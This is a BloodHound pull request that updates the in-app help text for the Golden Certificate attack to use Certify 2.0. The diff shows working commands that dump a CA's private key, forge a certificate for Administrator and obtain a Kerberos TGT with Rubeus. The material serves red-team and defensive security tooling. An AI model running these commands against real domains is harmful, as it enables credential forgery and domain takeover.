### PR TITLE
update GoldenCert to Certify 2.0 commands

### DIFF
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/References.tsx
@@ -27,19 +27,15 @@ const References: FC = () => {
                 https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/GhostPack/SharpDPAPI'>
-                https://github.com/GhostPack/SharpDPAPI
-            </Link>
-            <br />
             <Link
                 target='_blank'
                 rel='noopener'
-                href='https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil'>
-                https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
+                href='https://github.com/GhostPack/Certify/wiki/3-%E2%80%90-Domain-Persistence-Techniques#dpersist1---forging-certificates-with-stolen-ca-certificates'>
+                https://github.com/GhostPack/Certify/wiki/3-%E2%80%90-Domain-Persistence-Techniques#dpersist1---forging-certificates-with-stolen-ca-certificates
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/GhostPack/ForgeCert'>
-                https://github.com/GhostPack/ForgeCert
+            <Link target='_blank' rel='noopener' href='https://github.com/GhostPack/Certify'>
+                https://github.com/GhostPack/Certify
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/GhostPack/Rubeus'>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
@@ -20,49 +20,24 @@ import { FC } from 'react';
 const Abuse: FC = () => {
     return (
         <>
-            <Typography variant='body1'>
-                Obtain CA certificate incl. private key - using built-in GUI (certsrv.msc)
-            </Typography>
+            <Typography variant='body1'>Obtain CA certificate incl. private key</Typography>
             <Typography variant='body2'>
-                1) Open certsrv.msc as Administrator on the enterprise CA host.
-                <br />
-                2) Right-click on the enterprise CA and select "All Tasks" followed by "Back up CA...".
-                <br />
-                3) Click "Next", select "Private key and CA certificate", and select the location folder.
-                <br />
-                4) Click "Next", and set a password.
-                <br />
-                5) Click "Next" and click "Finish" to back up the certificate as a .p12 file.
-            </Typography>
-            <Typography variant='body1'>Obtain CA certificate incl. private key - using commandline tools</Typography>
-            <Typography variant='body2'>
-                1) Print all certificates of the host using SharpDPAPI:
-                <Typography component={'pre'}>{'SharpDPAPI.exe certificates /machine'}</Typography>
-                The enterprise CA certificate is the one where issuer and subject are identical.
-                <br />
-                <br />
-                2) Save the private key in .key file (e.g. cert.key) and the certificate in .pem file (cert.pem) in the
-                same folder.
-                <br />
-                3) Create a .pfx version of the CA certificate using certutil:
-                <Typography component={'pre'}>{'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'}</Typography>
-                <br />
-                4) Set password when prompted.
+                Use Certify (2.0) to export all certificates in the local machine certificate store and identify the CA
+                certificate by the name of the CA:
+                <Typography component={'pre'}>{'Certify.exe manage-self --dump-certs'}</Typography>
             </Typography>
             <Typography variant='body1'>Forge certificate and obtain a TGT as targeted principal</Typography>
             <Typography variant='body2'>
-                1) Forge a certificate of a target principal using ForgeCert:
+                Forge a certificate of a target principal:
                 <Typography component={'pre'}>
                     {
-                        'ForgeCert.exe --CaCertPath cert.pfx --CaCertPassword "password123!" --Subject "CN=User" --SubjectAltName "roshi@dumpster.fire" --NewCertPath target.pfx --NewCertPassword "NewPassword123!"'
+                        'Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500'
                     }
                 </Typography>
                 <br />
-                2) Request a TGT for the targeted principal using the certificate with Rubeus:
+                Request a TGT for the targeted principal using the certificate with Rubeus:
                 <Typography component={'pre'}>
-                    {
-                        'Rubeus.exe asktgt /user:Roshi /domain:dumpster.fire /certificate:target.pfx /password:NewPassword123!'
-                    }
+                    {'Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>'}
                 </Typography>
             </Typography>
         </>


### PR DESCRIPTION
<!-- README: https://github.com/SpecterOps/BloodHound/issues/672 -->
<!-- All pull requests require either an associated -->
<!-- Jira ticket or GitHub issue. PRs opened without -->
<!-- an associated discussion item will be closed! -->

## Description

Update GoldenCert edge abuse info to Certify 2.0 format

## Motivation and Context

Wasn't caught in this PR: https://github.com/SpecterOps/BloodHound/pull/1759

Resolves BED-6310

We want the abuse commands to work with the latest version of Certify.

## How Has This Been Tested?

Locally.

## Screenshots (optional):

## Types of changes

<!-- Please remove any items that do not apply. -->

- Chore (a change that does not modify the application functionality)

## Checklist:

<!-- Please make sure you have completed all following checks. -->
- [x] I have met the contributing prerequisites
  - Assigned myself to this PR
  - Added the appropriate labels
  - Associated an issue: https://github.com/SpecterOps/BloodHound/issues/672
  - Read the Contributing guide: https://github.com/SpecterOps/BloodHound/wiki/Contributing
- [x] I have ensured that related documentation is up-to-date
  - Open API docs
  - Code comments (GoDocs / JSDocs)
- [x] I have followed proper test practices
  - Added/updated tests to cover my changes
  - All new and existing tests passed


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- Documentation
  - Updated Golden Certificate help content to use a Certify-based workflow for CA certificate extraction, certificate forging, and TGT retrieval.
  - Replaced outdated links with current references to Certify resources; removed obsolete GhostPack/SharpDPAPI reference.
  - Simplified headings and revised examples to reflect Certify usage, including updated Rubeus command guidance.
  - Ensured remaining references (e.g., SpecterOps PDF, Rubeus, Certipy) are retained and accurate.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->